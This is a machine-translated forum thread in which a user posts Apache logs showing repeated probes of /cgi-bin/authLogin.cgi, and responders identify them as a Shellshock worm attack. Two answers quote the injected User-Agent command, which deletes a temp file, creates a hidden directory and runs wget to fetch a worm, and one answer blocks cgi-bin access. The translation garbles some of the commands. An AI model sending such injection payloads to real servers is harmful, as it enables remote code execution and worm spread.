好朋友,
我在Windows服务器数据中心使用带有php 5.3.29的Ampps服务器。
不幸的是,我在Windows服务器和我的网站中收到以下提示。
提示标题: 微软Windows
提示消息: Apache http服务器已停止工作。
问题导致程序无法正常工作。如果解决方案可用,Windows将关闭程序并通知您。
跟踪:
当我跟踪错误和访问日志时,我发现以下日志是原因。
在Apache访问日志中
202.175.83.36 - - [10 / Dec / 2014:05:58:50 -0500]" GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335 217.248.177.30 - - [10 / Dec / 2014:06:11:24 -0500]" GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335 209.153.244.6 - - [10 / Dec / 2014:07:09:17 -0500]" GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335 81.214.132.245 - - [10 / Dec / 2014:07:25:04 -0500]" GET /cgi-bin/authLogin.cgi HTTP / 1.1" 404 1335
在Apache错误日志中
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246]脚本未找到或无法统计:D:/ Program Files / Ampps / WWW /的cgi-bin / authLogin.cgi
请帮帮我。
答案 0 :(得分:1)
有一个Web机器人试图获得权限,因此它可以执行和执行类似S0.py的东西,我认为这是一种蠕虫,因此下载服务器受到了损害。 我喜欢S0.sh的副本,如果你碰巧得到一个给它利用db或类似的东西。 聪明的命令是: 获取/cgi-bin/authLogin.cgi HTTP / 1.1.Host:127.0.0.1.User-Agent :(){:; }; / bin / rm -rf /tmp/S0.sh& amp;& / bin / mkdir -p /share/HDB_DATA/.../php& amp ;& amp; / usr / bin / wget
下载后执行文件。 我想有一些关于HDB_DATA的东西,我甚至都没有。 "信息是最重要的!"
答案 1 :(得分:0)
如果您尝试打开此文件,会发生什么?
D:/ Program Files / Ampps / www / cgi-bin / authLogin.cgi
该消息表明该文件不存在,如404错误和未找到的消息"脚本"所示。
答案 2 :(得分:0)
最后我拒绝了那些客户端访问cgi-bin目录。
在cgi-bin目录中我创建了一个.htaccess文件
我在.htaccess
中添加了以下行拒绝所有人。
答案 3 :(得分:0)
我认为authLogin.cgi并不重要,除非它可能允许某人执行。问题是用户尝试或成功删除/tmp/S0.sh并在共享文件夹中创建目录php,然后执行wget。
/ bin / rm -rf /tmp/S0.sh& amp;& / bin / mkdir -p /share/HDB_DATA/.../php& amp ;& amp;的/ usr /斌/ wget的
这是在经历了那个想知道的时间后出现的问题: http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
“S0.sh由两个主要部分组成......第一部分进行初始设置并下载其他程序,然后第二部分安装蠕虫并执行一些额外的命令。”
所以抓住这个动作是一种真正的享受,最初没人知道称它为Shellshock。那里有一份S0.sh,你可以看到它是一种蠕虫,我认为是这种情况。
据我所知,蠕虫只是在浏览IP空间,寻找任何听8080端口的人。